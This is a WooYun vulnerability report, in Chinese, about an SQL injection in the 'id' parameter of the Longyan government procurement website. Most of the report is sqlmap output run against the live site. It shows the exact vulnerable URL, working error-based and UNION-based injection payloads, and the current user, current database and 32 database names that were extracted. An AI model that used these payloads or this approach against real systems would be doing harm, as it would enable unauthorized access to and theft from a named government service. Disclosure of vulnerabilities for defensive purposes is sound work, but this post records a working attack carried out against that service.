WooYun.org

站点：
www.fjlyzfcg.gov.cn 龙岩政府采购网
id参数没有过滤，导致注射漏洞
sqlmap跑起来
http://www.fjlyzfcg.gov.cn/viewbody.cfm?id=25789" --dbs --current-user --current-db
[*] starting at 16:13:14
[16:13:14] [INFO] resuming back-end DBMS 'microsoft sql server'
[16:13:14] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=25789 AND 9427=CONVERT(INT,(CHAR(58)+CHAR(97)+CHAR(102)+CHAR(115
)+CHAR(58)+(SELECT (CASE WHEN (9427=9427) THEN CHAR(49) ELSE CHAR(48) END))+CHAR
(58)+CHAR(97)+CHAR(114)+CHAR(111)+CHAR(58)))
Type: UNION query
Title: Generic UNION query (NULL) - 36 columns
Payload: id=25789 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, N
ULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
L, NULL, CHAR(58)+CHAR(97)+CHAR(102)+CHAR(115)+CHAR(58)+CHAR(99)+CHAR(75)+CHAR(8
1)+CHAR(116)+CHAR(106)+CHAR(88)+CHAR(116)+CHAR(71)+CHAR(76)+CHAR(114)+CHAR(58)+C
HAR(97)+CHAR(114)+CHAR(111)+CHAR(58)--
---
[16:13:14] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: ColdFusion, Apache
back-end DBMS: Microsoft SQL Server 2000
[16:13:14] [INFO] fetching current user
current user: '50user'
[16:13:14] [INFO] fetching current database
current database: 'lyzfcg'
[16:13:14] [INFO] fetching database names
[16:13:14] [INFO] the SQL query used returns 32 entries
available databases [32]:
[*] anxitdlz
[*] bosssoft
[*] bxzfcg
[*] clzfcg
[*] expert
[*] fjcgb_jx
[*] fjczNew
[*] fjjfjt
[*] fjzfcg
[*] fqzfcg
[*] fzcg
[*] fzzfcg
[*] gtzfcg
[*] HxReport_FQ
[*] HxReport_GD
[*] Hxreport_lj
[*] Hxreport_ST
[*] lycos85992
[*] lyzfcg
[*] lyzjk
[*] master
[*] mhzfcg
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] stwz
[*] tdlz
[*] tempdb
[*] xmtdlz
[*] zzzfcg
[*] zzzfcg2